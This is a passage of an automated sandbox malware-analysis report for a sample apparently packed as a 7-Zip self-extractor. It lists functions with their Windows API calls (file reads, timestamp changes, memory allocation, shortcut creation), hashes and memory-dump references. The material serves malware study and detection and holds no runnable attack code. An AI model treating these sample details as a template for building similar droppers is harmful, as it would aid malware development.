                                                                  • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                  • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                  • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                  Function 0040CC59 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                  • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                  • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                  • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                  Function 0040DADC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                  • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                  • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                  • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                  Function 0040DB6A Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FileTime
                                                                  • String ID:
                                                                  • API String ID: 1425588814-0
                                                                  • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                  • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                  • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                  • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                  Function 0040E9F7 Relevance: 1.3, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: memmove
                                                                  • String ID:
                                                                  • API String ID: 2162964266-0
                                                                  • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                  • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                  • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                  • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                  Function 0040E5D3 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID:
                                                                  • API String ID: 432778473-0
                                                                  • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                  • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                  • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                  • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                  Function 0040F42D Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                  • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                  • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                  • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                  Function 0040D660 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(000000C8,?,0040D6BD,?,?,004149B0,?), ref: 0040D668
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: 4fa0966ec9d1a571c7e323de1f115873bb7dbc4b3bb9478a793b66f53befbf65
                                                                  • Instruction ID: 440b35f337ff0cab18d5c2d903a40ad3125a020b698ff2c58677930dc960ea00
                                                                  • Opcode Fuzzy Hash: 4fa0966ec9d1a571c7e323de1f115873bb7dbc4b3bb9478a793b66f53befbf65
                                                                  • Instruction Fuzzy Hash: 92D02231B0431029EA5872B21C01EAF14848F60324B100C3FBC08F32D1DD3ECC56529D
                                                                  Function 00402F6C Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                  • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                  • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                  • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                  Function 0040D985 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                  • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                  • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                  • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                  Function 004024C4 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                  • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
                                                                  • Opcode Fuzzy Hash: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                  • Instruction Fuzzy Hash: D3C080301443007DED115F505E06B463A916B44717F508065F344540D0C7F484009509
                                                                  Function 00401B1F Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  • Opcode ID: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                  • Instruction ID: 5381ed20748db0b7fd93371e38984c83fa4171db9cf80dc6a42123bab5888d64
                                                                  • Opcode Fuzzy Hash: 727c456c664ec040fae2a494910ef8e866b16c48e489126d85a402f0e100615f
                                                                  • Instruction Fuzzy Hash: 45A002305446007ADE515B10DD05F457F516744B11F20C5547155540E586755654DA09
                                                                  Function 0040F3FC Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                  • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                  • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                  • Instruction Fuzzy Hash:

                                                                  Non-executed Functions

                                                                  Function 004034C1 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wtol.MSVCRT ref: 004034E5
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                  • _wtol.MSVCRT ref: 0040367F
                                                                  • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                  • String ID: .lnk
                                                                  • API String ID: 408529070-24824748
                                                                  • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                  • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                  • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                  • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                  Function 00401F9D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 150stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • wsprintfW.USER32 ref: 00401FFD
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • GetLastError.KERNEL32 ref: 00402017
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • GetLastError.KERNEL32 ref: 0040204C
                                                                  • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                  • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • _wtol.MSVCRT ref: 0040212A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                  • String ID: 7zSfxString%d$XpA$\3A
                                                                  • API String ID: 2117570002-3108448011
                                                                  • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                  • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                  • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                  • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                  Function 00401BDF Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                  • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                  • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                  • wsprintfW.USER32 ref: 00401C95
                                                                  • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                  • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                  • API String ID: 2639302590-365843014
                                                                  • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                  • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                  • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                  • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                  Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                  • String ID:
                                                                  • API String ID: 829399097-0
